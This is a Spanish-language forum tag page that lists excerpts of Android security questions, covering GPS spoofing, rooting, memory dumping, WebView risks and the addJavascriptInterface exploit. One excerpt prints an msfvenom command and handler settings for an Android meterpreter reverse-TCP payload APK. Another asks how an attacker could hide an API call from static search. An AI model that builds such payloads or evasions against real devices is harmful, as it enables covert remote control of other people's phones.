Preguntas con etiqueta 'android'

preguntas con etiqueta
5
respuestas

¿Cómo evitan que las aplicaciones basadas en la ubicación se dejen engañar por el GPS emulado?

Algunas aplicaciones como Foursquare requieren que el usuario se "registre" en lugares físicos para obtener beneficios económicos. Dado que los GPS emulados están disponibles para versiones personalizadas de Android, parece fácil engañar a es...
hecha 12.08.2014 - 07:29
0
respuestas

Registro de tarjeta de pago de Android, generación de token y verificación

Estaba tratando de encontrar información sobre Android Pay y cómo maneja la información de la tarjeta al agregarla a Android Pay y cómo se verifica la información del token. No pude encontrar información detallada. Al agregar una nueva tarjet...
hecha 08.11.2016 - 19:13
0
respuestas

Desbordamiento de búfer ¿Rooting vs SU a través de la recuperación?

Después de investigar sobre los detalles y técnicas de bajo nivel de los procesos de enraizamiento, descubrí que ocurre principalmente a través del desbordamiento del búfer para obtener acceso a la raíz a través de la carga útil en ejecución (bi...
hecha 11.08.2016 - 03:49
0
respuestas

Mitigar el volcado de memoria y analizar una aplicación

He usado Frida y Fridump para Memory Dump & Descargue cadenas en un dispositivo móvil en el que instalé una aplicación para realizar pruebas. En el archivo strings.txt que he extraído utilizando las herramientas mencionadas anteriormente,...
hecha 12.09.2016 - 15:02
1
respuesta

¿Riesgos de seguridad con setDomStorageEnabled (true) en Android?

¿Cuáles son los riesgos de seguridad asociados con habilitar el método setDomStorageEnabled(true) ? Reference.     
hecha 08.06.2016 - 10:58
1
respuesta

Borrado de Lastpass Preminum desde el teléfono móvil [duplicar]

Esta mañana dejé caer mi teléfono LG G4 (Android 6 Marshmallow) y destrozé la pantalla. Planeo comprar un teléfono nuevo y brillante y vender el viejo barato. Utilizo Lastpass Premium para almacenar todas mis contraseñas, y desde que soy...
hecha 14.06.2016 - 13:55
0
respuestas

Posible alcance del atacante de Dmg si él / ella puede SSH en un teléfono Android

Recientemente comencé a investigar la capacidad de SSH en un dispositivo Android. Por lo que he visto, este es un desafío resuelto, lo que me hace preguntarme cuánto daño podría hacer un atacante. Digamos que un atacante ha logrado físicament...
hecha 24.05.2016 - 22:34
0
respuestas

Android no está conectado a kali linux con meterpreter en metasploit

Sigo corriendo en un error. Creo una apk: msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R > test.apk En la consola, configuro el controlador múltiple /: set PAYLOAD android/meterpreter/reverse_tcp set LHOST...
hecha 09.05.2016 - 18:45
0
respuestas

¿Cómo llamar "sigilosamente" a una función Java para evitar la búsqueda de texto?

Supongamos que soy un atacante, quiero llamar a una función API desde una aplicación de Android, por ejemplo, Build.getRadioVersion() . Pero quiero mantener esta llamada sigilosa, es decir, no se puede buscar a través de, por ejemplo, g...
hecha 01.05.2016 - 06:52
0
respuestas

web view addjavascriptinterface exploit

He estado golpeando mi cabeza alrededor de esto durante casi 56 horas (+/- algunas que saqué para tener un par de siestas y RedBulls) y no he podido llegar a ninguna parte con eso hasta ahora. Estoy tratando de entender la interfaz addjavascr...
hecha 23.06.2016 - 19:53